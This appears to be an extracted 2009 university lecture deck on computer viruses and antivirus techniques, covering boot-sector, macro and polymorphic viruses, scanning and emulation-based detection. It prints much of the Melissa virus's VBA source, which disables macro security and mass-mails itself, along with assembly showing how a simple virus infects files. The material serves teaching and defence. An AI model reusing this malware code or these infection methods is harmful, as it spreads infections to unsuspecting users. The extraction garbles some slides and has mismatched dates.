CSE 127 Computer Security Spring 2009 Malware I

  • Slides: 77
Download presentation
CSE 127 Computer Security Spring 2009 Malware I: Viruses and virus-defense Stefan Savage Many

CSE 127 Computer Security Spring 2009 Malware I: Viruses and virus-defense Stefan Savage Many sides courtesy Carey Nachenberg

Recap l Various ways to compromise software systems based in input and timing u

Recap l Various ways to compromise software systems based in input and timing u l l l Buffer overflows, format string errors, TOCTOU, SQL injection, XSS etc… But once you’ve compromised system, then what does the malicious software do? First: propagates itself to create an installed base Today: viruses – the oldest mass malware 15 September 2020

Reminder l You have a project due on Tuesday 15 September 2020 3

Reminder l You have a project due on Tuesday 15 September 2020 3

Viruses l A computer virus is a (malicious) program u u u l Attaches

Viruses l A computer virus is a (malicious) program u u u l Attaches to a host program or data Creates (possibly modified) copies of itself Payload of program may have other effects (deleting files, opening backdoors, printing messages, etc) Viruses traditionally require some user action to activate (i. e. execute some file, open some spreadsheet, etc) 15 September 2020

Virus Writer’s Goals l l l Hard to detect Hard to destroy or deactivate

Virus Writer’s Goals l l l Hard to detect Hard to destroy or deactivate Spreads infection widely/quickly Can reinfect a host Easy to create 15 September 2020

Kinds of Viruses l Boot Sector Viruses u l Memory Resident Viruses u l

Kinds of Viruses l Boot Sector Viruses u l Memory Resident Viruses u l Embedded in documents (like Word docs) E-mail/IM Viruses u l Standard infected executable Macro Viruses u l Historically important, but less common today Spread via attachments Web platform viruses u Spread on Web sites (e. g. social net applications) 15 September 2020

Boot sector Viruses (old school) MBR l boot Bootstrap Process: u l boot Firmware

Boot sector Viruses (old school) MBR l boot Bootstrap Process: u l boot Firmware (ROM) copies MBR (master boot record) to memory, jumps to that program MBR (or Boot Sector) u u Fixed position on disk “Chained” boot sectors permit longer Bootstrap Loaders 15 September 2020 7

Boot sector Viruses MBR l l l boot virus Virus breaks the chain Inserts

Boot sector Viruses MBR l l l boot virus Virus breaks the chain Inserts virus code Reconnects chain afterwards 15 September 2020 boot

Why attack the Bootstrap? l Automatically executed before OS is running u l OS

Why attack the Bootstrap? l Automatically executed before OS is running u l OS hides boot sector information from users u u l Any thus, before detection tools are running Hard to discover that the virus is there Harder to fix Any good virus scanning software scans the boot sectors u u But good bootsector viruses may restore good bootsector during normal operation (replace it when you logout or when anti-virus software isn’t running) Bootsector malware is back with a vengeance (Meebroot/Sinowal) 15 September 2020 9

Virus Attachment to Host Code Original Program l Simplest case: insert copy at the

Virus Attachment to Host Code Original Program l Simplest case: insert copy at the beginning of an executable file u u l Runs before other code of the program Historically most common program virus Runs before & after original program u l Modified Program Virus can clean up after itself Virus could modify code in place u u Doesn’t change size, but could change behavior Maybe harder to detect? 15 September 2020 10

Macro Viruses l l l Many applications support Macros are just programs Word processors

Macro Viruses l l l Many applications support Macros are just programs Word processors & Spreadsheets u u l Startup macro Macros turned on by default Visual Basic Script (VBScript) 15 September 2020 13

Melissa Macro Virus l Implementation u l VBA (Visual Basic for Applications) code associated

Melissa Macro Virus l Implementation u l VBA (Visual Basic for Applications) code associated with the "document. open" method of Word Strategy u u u Email message containing an infected Word document as an attachment (social engineering) Opening Word document triggers virus if macros are enabled Under certain conditions included attached documents created by the victim 15 September 2020

Melissa Macro Virus: Behavior l Setup u Lowers the macro security settings Permit all

Melissa Macro Virus: Behavior l Setup u Lowers the macro security settings Permit all macros to run without warning Checks registry for key value “… by Kwyjibo” u HKEY_Current_UserSoftwareMicrosoftOfficeMelissa? u u l Propagation u Sends email message to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro 15 September 2020 15

Melissa Macro Virus: Behavior l Propagation Continued u u l Infects Normal. doc template

Melissa Macro Virus: Behavior l Propagation Continued u u l Infects Normal. doc template file Normal. doc is used by all Word documents “Joke” u If minute matches the day of the month, the macro inserts message “Twenty-two points, plus tripleword-score, plus fifty points for using all my letters. Game's over. I'm outta here. ” 15 September 2020 16

// Melissa Virus Source Code Private Sub Document_Open() On Error Resume Next If System.

// Melissa Virus Source Code Private Sub Document_Open() On Error Resume Next If System. Private. Profile. String("", "HKEY_CURRENT_USERSoftwareMicrosoftOffice9. 0WordSecurity", "Level") <> "" Then Command. Bars("Macro"). Controls("Security. . . "). Enabled = False System. Private. Profile. String("", "HKEY_CURRENT_USERSoftwareMicrosoftOffice9. 0WordSecurity", "Level") = 1& Else Command. Bars("Tools"). Controls("Macro"). Enabled = False Options. Confirm. Conversions = (1 - 1): Options. Virus. Protection = (1 - 1): Options. Save. Normal. Prompt = (1 - 1) End If Dim Unga. Das. Outlook, Das. Mapi. Name, Break. Um. Off. ASlice Set Unga. Das. Outlook = Create. Object("Outlook. Application") Set Das. Mapi. Name = Unga. Das. Outlook. Get. Name. Space("MAPI") 15 September 2020 17

If System. Private. Profile. String("", "HKEY_CURRENT_USERSoftwareMicrosoftOffice", "Melissa? ") <> ". . . by Kwyjibo"

If System. Private. Profile. String("", "HKEY_CURRENT_USERSoftwareMicrosoftOffice", "Melissa? ") <> ". . . by Kwyjibo" Then If Unga. Das. Outlook = "Outlook" Then Das. Mapi. Name. Logon "profile", "password" For y = 1 To Das. Mapi. Name. Address. Lists. Count Set Addy. Book = Das. Mapi. Name. Address. Lists(y) x=1 Set Break. Um. Off. ASlice = Unga. Das. Outlook. Create. Item(0) For oo = 1 To Addy. Book. Address. Entries. Count Peep = Addy. Book. Address. Entries(x) Break. Um. Off. ASlice. Recipients. Add Peep x=x+1 If x > 50 Then oo = Addy. Book. Address. Entries. Count Next oo Break. Um. Off. ASlice. Subject = "Important Message From " & Application. User. Name Break. Um. Off. ASlice. Body = "Here is that document you asked for. . . don't show anyone else ; -)" Break. Um. Off. ASlice. Attachments. Add Active. Document. Full. Name Break. Um. Off. ASlice. Send Peep = "" Next y Das. Mapi. Name. Logoff End If

Melissa Virus l Transmission Rate u u u l Damage u u l The

Melissa Virus l Transmission Rate u u u l Damage u u l The first confirmed reports of Melissa were received on Friday, March 26, 1999. By Monday, March 29, it had reached more than 100, 000 computers. One site got 32, 000 infected messages in 45 minutes. Denial of service: mail systems off-line. Could have been much worse Remedy u u u Filter mail for virus signature (macro in. doc files) Don’t run Macros in unknown documents by default Clean Normal. doc 15 September 2020 19

Detecting Viruses l l l 20 Scanning Integrity checking Heuristic detection

Detecting Viruses l l l 20 Scanning Integrity checking Heuristic detection

Virus Signatures l Viruses can’t be completely invisible: u u u l Issues u

Virus Signatures l Viruses can’t be completely invisible: u u u l Issues u u 21 Code must be stored somewhere Virus must do something when it runs Idea: look in files for “signature” byte sequences that are unique to the virus Where to scan (beginning of file, whole file, registry settings, etc) How to scan (look for “ILOVEYOU” string, or actually execute program) How long to scan (tradeoffs in performance/coverage) How to distinguish polymorphs (research issue)

0100 0102 0105 0108 010 A 010 C 010 D 0110 0111 0112 0113

0100 0102 0105 0108 010 A 010 C 010 D 0110 0111 0112 0113 0116 0117 0118 0119 011 A 011 B 011 E 0121 0123 0127 0129 012 B 0130 0131 0133 0135 0138 013 B 013 D EB 1 C BE 1 B 02 BF 1 B 01 8 BCE F 7 D 9 FC B 81 B 01 06 50 06 B 81801 50 CB F 3 A 4 CB E 93221 83 C 24 F 8 BFA 81 FF 8000 725 E 7406 C 606250273 90 FEC 5 7303 80 C 140 B 8010 C 8 BD 6 CD 13 JMP MOV MOV NEG CLD MOV PUSH MOV PUSH RETF REPZ MOVSB RETF JMP ADD MOV CMP JB JZ MOV NOP INC JNB ADD MOV INT 011 E SI, 021 B DI, 011 B CX, SI CX The Simple Virus AX, 011 B ES AX, 0118 AX 2250 DX, +4 F DI, DX DI, 0080 0187 0131 BYTE PTR [0225], 73 CH 0138 CL, 40 AX, 0 C 01 DX, SI 13 Infected Program 1. User runs an infected program. 2. Program transfers control to the virus.

0100 0102 0105 0108 010 A 010 C 010 D 0110 0111 0112 0113

0100 0102 0105 0108 010 A 010 C 010 D 0110 0111 0112 0113 0116 0117 0118 0119 011 A 011 B 011 E 0121 0123 0127 0129 012 B 0130 0131 0133 0135 0138 013 B 013 D EB 1 C BE 1 B 02 BF 1 B 01 8 BCE F 7 D 9 FC B 81 B 01 06 50 06 B 81801 50 CB F 3 A 4 CB E 93221 83 C 24 F 8 BFA 81 FF 8000 725 E 7406 C 606250273 90 FEC 5 7303 80 C 140 B 8010 C 8 BD 6 CD 13 JMP MOV MOV NEG CLD MOV PUSH MOV PUSH RETF REPZ MOVSB RETF JMP ADD MOV CMP JB JZ MOV NOP INC JNB ADD MOV INT 011 E SI, 021 B DI, 011 B CX, SI CX The Simple Virus AX, 011 B ES AX, 0118 AX 2250 DX, +4 F DI, DX DI, 0080 0187 0131 BYTE PTR [0225], 73 CH 0138 CL, 40 AX, 0 C 01 DX, SI 13 Infected Program 0100 0102 0104 0106 010 A 010 E 0110 0112 0115 0117 011 A 011 C 0120 0122 0124 0129 012 A 012 C 012 E 0132 0135 0137 B 435 B 021 CD 21 8 C 06 A 002 891 E 9 E 02 B 425 B 021 BA 2001 CD 21 83 C 24 F 8 BFA 81 FF 8000 725 E 7406 C 606250273 90 FEC 5 7303 80 C 140 B 8010 C 8 BD 6 CD 13 MOV INT MOV MOV MOV INT ADD MOV CMP JB JZ MOV NOP INC JNB ADD MOV INT AH, 35 AL, 21 21 [02 A 0], ES [029 E], BX AH, 25 AL, 21 DX, 0120 21 DX, +4 F DI, DX DI, 0080 0187 0131 BYTE PTR [0225], 73 CH 0138 CL, 40 AX, 0 C 01 DX, SI 13 3. Virus locates a new program. 4. Virus appends its logic to the end of the new file.

0100 0102 0105 0108 010 A 010 C 010 D 0110 0111 0112 0113

0100 0102 0105 0108 010 A 010 C 010 D 0110 0111 0112 0113 0116 0117 0118 0119 011 A 011 B 011 E 0121 0123 0127 0129 012 B 0130 0131 0133 0135 0138 013 B 013 D EB 1 C BE 1 B 02 BF 1 B 01 8 BCE F 7 D 9 FC B 81 B 01 06 50 06 B 81801 50 CB F 3 A 4 CB E 93221 83 C 24 F 8 BFA 81 FF 8000 725 E 7406 C 606250273 90 FEC 5 7303 80 C 140 B 8010 C 8 BD 6 CD 13 JMP MOV MOV NEG CLD MOV PUSH MOV PUSH RETF REPZ MOVSB RETF JMP ADD MOV CMP JB JZ MOV NOP INC JNB ADD MOV INT 011 E SI, 021 B DI, 011 B CX, SI CX The Simple Virus AX, 011 B ES AX, 0118 AX 2250 DX, +4 F DI, DX DI, 0080 0187 0131 BYTE PTR [0225], 73 CH 0138 CL, 40 AX, 0 C 01 DX, SI 13 Infected Program 0100 0102 0104 0106 010 A 010 E 0110 0112 0115 0117 011 A 011 C 0120 0122 0124 0129 012 A 012 C 012 E 0132 0135 0137 B 435 EB 1 C B 021 CD 21 8 C 06 A 002 891 E 9 E 02 B 425 B 021 BA 2001 CD 21 83 C 24 F 8 BFA 81 FF 8000 725 E 7406 C 606250273 90 FEC 5 7303 80 C 140 B 8010 C 8 BD 6 CD 13 MOV JMP MOV INT MOV MOV MOV INT ADD MOV CMP JB JZ MOV NOP INC JNB ADD MOV INT AH, 35 0117 AL, 21 21 [02 A 0], ES [029 E], BX AH, 25 AL, 21 DX, 0120 21 DX, +4 F DI, DX DI, 0080 0187 0131 BYTE PTR [0225], 73 CH 0138 CL, 40 AX, 0 C 01 DX, SI 13 5. Virus updates the new program so the virus gets control when the program is launched.

Head/Tail Scanners Most of these application-infecting viruses attached themselves to either the top or

Head/Tail Scanners Most of these application-infecting viruses attached themselves to either the top or bottom of the host file: Virus Host So anti-virus engineers built head/tail scanners. The scanner loads the head and tail regions of the file into a buffer and then scans with a multi-string search algorithm. 25

So what do the bad guys do? l l Move the virus to the

So what do the bad guys do? l l Move the virus to the middle of the file Becomes prohibitively expensive to scan u l Solution: scalpel scanning u u 26 Must scan whole file Idea: limit scanning to likely entry-points for viruses If you have more time you can also scan for more than just strings (regular expressions)

Scalpel Scanning 1. Locate the main program entry-point. 2. While the current instruction is

Scalpel Scanning 1. Locate the main program entry-point. 2. While the current instruction is a JUMP or a CALL instruction, trace it. 3. If the current instruction is not a JUMP or CALL instruction, search for all fingerprints in this region of the file. 27 0100 0102 0104 0106 0108 010 A 010 E 0110 0112 0115 0117 011 A 011 C 0120 0122 0124 0129 012 A 012 C 012 E 0132 0135 0137 EB 04 B 021 CD 21 EB 09 B 404 891 E 9 E 02 B 425 B 021 E 90200 CD 21 83 C 24 F 8 BFA 81 FF 8000 725 E 7406 C 606250273 90 FEC 5 7303 80 C 140 B 8010 C 8 BD 6 CD 13 JMP JMP MOV INT JMP MOV MOV JMP INT ADD MOV CMP JB JZ MOV NOP INC JNB ADD MOV INT JMP 106 AL, 21 21 112 AH, 04 [029 E], BX AH, 25 AL, 21 117 21 DX, +4 F DI, DX DI, 0080 0187 0131 BYTE PTR [0225], 73 ADD CH 0138 CL, 40 AX, 0 C 01 DX, SI 13

The Encrypted Virus Soon after the first generation of executable viruses, virus authors began

The Encrypted Virus Soon after the first generation of executable viruses, virus authors began writing self-encrypting strains. These viruses carry a small decryption loop that runs first, decrypts the virus body and then launches the virus. Each time the virus infects a new file, it changes the encryption key so the virus body looks different. 28 Decrypt KEY 1 Wjsvt HOST Decrypt KEY 2 Uhqtr HOST

The Encrypted Virus 1. MOV DI, 120 h The decryption 2. MOV AX, [DI]

The Encrypted Virus 1. MOV DI, 120 h The decryption 2. MOV AX, [DI] routine stays 3. XOR AX, 5132 h the same. Only 4. MOV [DI], AX the key(s) 5. ADD DI, 2 h change. 6. CMP DI, 2500 h 7. JNE 3 8. WJSVTPBMZPL The encrypted 9. NAADJGNANW body changes. . 1. MOV DI, 120 h 2. MOV AX, [DI] 3. XOR AX, 0030 h 4. MOV [DI], AX 5. ADD DI, 2 h 6. CMP DI, 2500 h 7. JNE 3 8. PKEPAJHENZAW 9. MNANTPOOTIZN. . . Still easy to detect because the decryption loop stays the same. 29

The Polymorphic Virus l l Polymorphic viruses are self-encrypting viruses with a changing decryption

The Polymorphic Virus l l Polymorphic viruses are self-encrypting viruses with a changing decryption algorithm When infecting a new file, such a virus: u u u 30 Generates brand-new decryption code from scratch Encrypts a copy of itself using a complementary encryption algorithm Inserts both the new decryption code and the encrypted body of the virus into target file

The Polymorphic Virus RAM Host Program Decryption Loop Virus Mutation Engine 31 1. User

The Polymorphic Virus RAM Host Program Decryption Loop Virus Mutation Engine 31 1. User Executes Program

The Polymorphic Virus RAM Host Program Decryption Loop Virus Mutation Engine 32 1. User

The Polymorphic Virus RAM Host Program Decryption Loop Virus Mutation Engine 32 1. User Executes Program 2. Virus Decrypts Itself

The Polymorphic Virus RAM Host Program Decryption Loop Virus Mutation Engine 33 1. User

The Polymorphic Virus RAM Host Program Decryption Loop Virus Mutation Engine 33 1. User Executes Program 2. Virus Decrypts Itself

The Polymorphic Virus RAM Host Program Decryption Loop Virus Mutation Engine 34 1. User

The Polymorphic Virus RAM Host Program Decryption Loop Virus Mutation Engine 34 1. User Executes Program 2. Virus Decrypts Itself

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine Decryption Loop Virus Mutation Engine 35 3. Virus finds new prog.

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine Decryption Loop’ Decryption Loop Virus Mutation Engine 36 3. Virus finds new prog. 4. Mutation engine creates new decryptor.

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine Decryption Loop’ Decryption Loop Virus Mutation Engine 37 5. Virus makes a new Mutation Engine copy of itself and encrypts this copy.

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine Decryption Loop’ Decryption Loop Virus Mutation Engine 38 5. Virus makes a new Mutation Engine copy of itself and encrypts this copy.

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine Decryption Loop’ Decryption Loop Virus Mutation Engine 39 5. Virus makes a new Mutation Engine copy of itself and encrypts this copy.

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine Decryption Loop’ Decryption Loop Virus Mutation Engine 40 5. Virus makes a new Mutation Engine copy of itself and encrypts this copy.

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine Decryption Loop’ Decryption Loop Virus Mutation Engine 41 6. Virus appends the new Mutation Engine decryptor and encrypted virus body to new file.

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine

The Polymorphic Virus RAM Host Program Decryption Loop Virus Host Program (New) Mutation Engine Decryption Loop’ Decryption Loop Virus Mutation Engine 42 Mutation Engine Virus Mutation Engine

The Polymorphic Virus RAM And we have a new infection! Decryption Loop Virus Host

The Polymorphic Virus RAM And we have a new infection! Decryption Loop Virus Host Program (New) Mutation Engine Decryption Loop’ Virus Mutation Engine 43

The Polymorphic Virus Addr 0100 0101 0104 0107 0108 010 B 010 E 0110

The Polymorphic Virus Addr 0100 0101 0104 0107 0108 010 B 010 E 0110 0111 0114 0116 0118 011 B 011 D 011 E 0121 0123 0124 0127 012 A 012 C 012 E 0131 0133 0134 0137 0139 013 A 013 D 013 F 0141 0145 0147 0149 014 C 014 E 0150 0154 0157 015 A 015 C 015 D 015 F 0161 0164 0166 0167 016 A 016 D 016 F 0170 0172 0175 0177 0179 017 A 017 B 017 C Machine Code 50 B 8347 E 25 A 907 95 B 840 B 2 BABBB 8 F 7 EA 93 B 8 B 4 D 2 03 C 3 2 BC 5 BA 479 A F 7 E 2 95 B 809 F 4 2 BC 5 91 B 8 AB 6 A BA 972 C F 7 E 2 D 1 C 0 80 E 11 F D 3 E 0 91 B 8 E 1 CE 03 C 1 93 B 84 A 43 29 C 3 F 7 DB 8 B 86381 B 8 ACB D 3 C 8 2 D 23 C 9 B 108 D 3 C 8 8786381 B B 80765 BA 55 B 3 F 7 E 2 96 8 BC 5 2 BC 6 BAE 337 F 7 E 2 96 B 80765 BA 55 B 3 F 7 E 2 91 8 BC 6 BACBC 5 F 7 E 2 03 C 1 95 45 45 75 A 0 Mnemonic PUSH AX MOV AX, 7 E 34 AND AX, 07 A 9 XCHG BP, AX MOV AX, B 240 MOV DX, B 8 BB IMUL DX XCHG BX, AX MOV AX, D 2 B 4 ADD AX, BX SUB AX, BP MOV DX, 9 A 47 MUL DX XCHG BP, AX MOV AX, F 409 SUB AX, BP XCHG CX, AX MOV AX, 6 AAB MOV DX, 2 C 97 MUL DX ROL AX, 1 AND CL, 1 F SHL AX, CL XCHG CX, AX MOV AX, CEE 1 ADD AX, CX XCHG BX, AX MOV AX, 434 A SUB BX, AX NEG BX MOV AX, [BP+1 B 38] MOV CL, BL ROR AX, CL SUB AX, C 923 MOV CL, 08 ROR AX, CL XCHG AX, [BP+1 B 38] MOV AX, 6507 MOV DX, B 355 MUL DX XCHG SI, AX MOV AX, BP SUB AX, SI MOV DX, 37 E 3 MUL DX XCHG SI, AX MOV AX, 6507 MOV DX, B 355 MUL DX XCHG CX, AX MOV AX, SI MOV DX, C 5 CB MUL DX ADD AX, CX XCHG BP, AX INC BP JNZ 011 E Addr Machine Code Mnemonic 0200 BE 36 F 2 MOV SI, F 236 0203 8 BFE MOV DI, SI 0205 B 807 D 7 MOV AX, D 707 0208 33 C 7 XOR AX, DI 020 A 95 XCHG BP, AX 020 B B 858 AC MOV AX, AC 58 020 E F 7 ED IMUL BP 0210 2560 B 1 AND AX, B 160 0213 95 XCHG BP, AX 0214 B 8 C 0 EA MOV AX, EAC 0 0217 8 BCD MOV CX, BP 0219 80 E 11 F AND CL, 1 F 021 C D 3 E 8 SHR AX, CL 021 E 85 C 0 TEST AX, AX 0220 7503 JNZ 0225 0222 FB STI 0223 F 1 DB F 1 0224 AB STOSW 0225 91 XCHG CX, AX 0226 36 SS: 0227 8 B 852310 MOV AX, [DI+1023] 022 B D 3 C 0 ROL AX, CL 022 D BA 4 FB 9 MOV DX, B 94 F 0230 F 7 E 2 MUL DX 0232 36 SS: 0233 89852310 MOV [DI+1023], AX 0237 8 BEF MOV BP, DI 0239 8 BFD MOV DI, BP 023 B 47 INC DI 023 C 47 INC DI 023 D 75 C 6 JNZ 0205 Here we have a decryption loop from an Mt. E-based virus infection. And here’s a second generation decryption loop of the same virus strain. 44

Detecting The Polymorphic Virus So how do we detect such a beast? 1. Use

Detecting The Polymorphic Virus So how do we detect such a beast? 1. Use lots of wildcard strings/scripts: B 98104%F%1 BD? ? %FBE? ? %F%53142? ? %F? ? C 0%F 45%F? ? CC%FE 2 B 98104%8 BB? ? %FBE? ? %F%53140? ? %F? ? C 0%F 43%F? ? CC%FE 2 B 98104%F%5 BE? ? %F%53144? ? %F? ? C 0%F 46%F? ? CC%FE 2 B 98104%F%9 BF? ? %F%53145? ? %F? ? C 0%F 47%F? ? CC%FE 2 B 98104%F%1 BD? ? %FBF? ? %F%53143? ? %F? ? C 0%F 47%F? ? CC%FE 2 B 98104%8 BB? ? %F%1 BF? ? %F%53141? ? %F? ? C 0%F 47%F? ? CC%FE 2 The number of strings (alg. sigs) explodes quickly! Detecting the decryption loop is prone to false positives! 2. X-ray techniques (plaintext attack on encrypted virus body) 45

X-ray scanning Assume the file is infected and perform a plain-text attack of the

X-ray scanning Assume the file is infected and perform a plain-text attack of the encrypted virus code. This only works for simple schemes (but its often sufficient). Scanned file: 60 5 C 5 D 47 14 -55 14 40 51 47 40 Virus plain-text: 54 68 69 73 20 -61 20 74 65 73 74 + +++ 34 34 Host Program AMBCAPQYEQYQ WERQWER 46 ERGQWETWLRW The key must be 34! The scheme must be XOR! 7 bytes from EOF = “VIRUS”?

“Generic” Decryption l Invented by Alan Solomon (a. k. a. Dr. Solomon) u l

“Generic” Decryption l Invented by Alan Solomon (a. k. a. Dr. Solomon) u l Assumptions u u u l Chose name to obscure how it worked Virus gains control of the host immediately Virus decrypts itself deterministically Virus has a some static body that can be detected with traditional signatures Key idea: u Emulate code execution until the virus decrypts itself » Typically use some sort of virtual machine (VM) environment u 47 Search for signatures in memory

Generic Decryption Host Program Simulated OS and other data structures Host Program Decryption Loop

Generic Decryption Host Program Simulated OS and other data structures Host Program Decryption Loop 1. Load suspected program into VM. 2. Allow the program to execute normally. Decryption Loop Virus Mutation Engine 48 Program Off Disk Virtual Machine Modified Memory

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 Simulated OS and other data structures Host Program 1. Load suspected program into VM. 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Decryption Loop Virus Mutation Engine 49 Virtual Machine Modified Memory

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 Simulated OS and other data structures Host Program 1. Load suspected program into VM. 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Decryption Loop Virus Mutation Engine 50 Virtual Machine Modified Memory

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 Simulated OS and other data structures Host Program 1. Load suspected program into VM. 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Decryption Loop Virus Mutation Engine 51 Virtual Machine Modified Memory

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 1. Load suspected program into VM. 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Simulated OS and other data structures Host Program Decryption Loop x Virus Mutation Engine 52 Virtual Machine Modified Memory

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 Host Program Decryption Loop And on it goes. . . 1. Load suspected program into VM. 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Simulated OS and other data structures x Virus Mutation Engine 53 Virtual Machine Modified Memory

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 Host Program Decryption Loop And on it goes. . . 1. Load suspected program into VM. 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Simulated OS and other data structures Virus x x Mutation Engine 54 Virtual Machine Modified Memory

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 Host Program Decryption Loop And on it goes. . . 1. Load suspected program into VM. 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Simulated OS and other data structures Virus x x x Mutation Engine 55 Virtual Machine Modified Memory

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 Host Program Decryption Loop And on it goes. . . Virus Mutation Engine 56 1. Load suspected program into VM. 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Simulated OS and other data structures Virtual Machine x x Modified Memory

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to

Generic Decryption 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 Simulated OS and other data structures Host Program Decryption Loop And on it goes. . . Virus Mutation Engine 57 Virtual Machine x x 1. Load suspected program into VM. 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. 4. Scan all modified areas of virtual memory for virus signatures. Modified Memory

Generic Decryption KILL Simulated OS and other data structures Host Program Decryption Loop Virus

Generic Decryption KILL Simulated OS and other data structures Host Program Decryption Loop Virus Mutation Engine 58 Virtual Machine x x 1. Load suspected program into VM. 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. 4. Scan all modified areas of virtual memory for virus signatures. Modified Memory

Challenges with GD l How long to emulate program? u u l Emulate too

Challenges with GD l How long to emulate program? u u l Emulate too long and the system slows to a crawl Don’t emulate enough and you might miss the virus Two approaches u Heuristic-driven emulation » Emulate while you see “suspicious” behavior n Unusual instruction sequences, sequence modifications of memory, etc » Suffers from false positives and false negatives & can be avoided » Prolong execution on uninfected files u 59 Profile driven emulation

Profile-based Emulation For each new polymorphic virus strain, engineers identify its key characteristics and

Profile-based Emulation For each new polymorphic virus strain, engineers identify its key characteristics and then add this profile to the anti -virus data files. Fetch and emulate instructions from a program file as long as its instructions are consistent with at least one polymorphic virus profile. When all viruses have been eliminated from consideration, cease emulation. 60

0100 0102 0104 0106 010 A 010 E 0110 0112 0115 0117 011 A

0100 0102 0104 0106 010 A 010 E 0110 0112 0115 0117 011 A 011 C 0120 0122 0124 0129 61 JMP MOV INT MOV MOV MOV INT ADD MOV CMP JB JZ MOV NOP 117 AL, 21 21 [02 A 0], ES [029 E], BX AH, 25 AL, 21 DX, 0120 21 DX, +4 F DI, DX DI, 0080 0187 0131 BYTE PTR [0225], 73 Mt. E DSCE. . . SMEG AD D SU opco B d XO opco e de R IN opco Co de p MO cod e V RO opc od L IN opco e T d DE opco e C d NO opco e d P JM opc e P o ode pco de Profile-based Emulation 0111000001. . 1001000000. . . 000111. .

0100 0102 0104 0106 010 A 010 E 0110 0112 0115 0117 011 A

0100 0102 0104 0106 010 A 010 E 0110 0112 0115 0117 011 A 011 C 0120 0122 0124 0129 62 JMP MOV INT MOV MOV MOV INT ADD MOV CMP JB JZ MOV NOP 117 AL, 21 21 [02 A 0], ES [029 E], BX AH, 25 AL, 21 DX, 0120 21 DX, +4 F DI, DX DI, 0080 0187 0131 BYTE PTR [0225], 73 Mt. E DSCE. . . SMEG AD D SU opco B d XO opco e de R IN opco Co de p MO cod e V RO opc od L IN opco e T d DE opco e C d NO opco e d P JM opc e P o ode pco de Profile-based Emulation 0111000001. . 1001000000. . . 1001000111. .

0100 0102 0104 0106 010 A 010 E 0110 0112 0115 0117 011 A

0100 0102 0104 0106 010 A 010 E 0110 0112 0115 0117 011 A 011 C 0120 0122 0124 0129 63 JMP MOV INT MOV MOV MOV INT ADD MOV CMP JB JZ MOV NOP 117 AL, 21 21 [02 A 0], ES [029 E], BX AH, 25 AL, 21 DX, 0120 21 DX, +4 F DI, DX DI, 0080 0187 0131 BYTE PTR [0225], 73 Mt. E DSCE. . . SMEG AD D SU opco B d XO opco e R o de p IN C o code MO pcod e V RO opc od L IN opco e T d DE opco e C d NO opco e d P JM opc e P o ode pco de Profile-based Emulation 0111000001. . 1001000000. . . 100111. .

0100 0102 0104 0106 010 A 010 E 0110 0112 0115 0117 011 A

0100 0102 0104 0106 010 A 010 E 0110 0112 0115 0117 011 A 011 C 0120 0122 0124 0129 64 JMP MOV INT MOV MOV MOV INT ADD MOV CMP JB JZ MOV NOP 117 AL, 21 21 [02 A 0], ES [029 E], BX AH, 25 AL, 21 DX, 0120 21 DX, +4 F DI, DX DI, 0080 0187 0131 BYTE PTR [0225], 73 Mt. E DSCE. . . SMEG AD D SU opco B d XO opco e R o de p IN C o code MO pcod e V RO opc od L IN opco e T d DE opco e C d NO opco e d P JM opc e P o ode pco de Profile-based Emulation 0111000001. . 1001000000. . . 100111. . and so on. . .

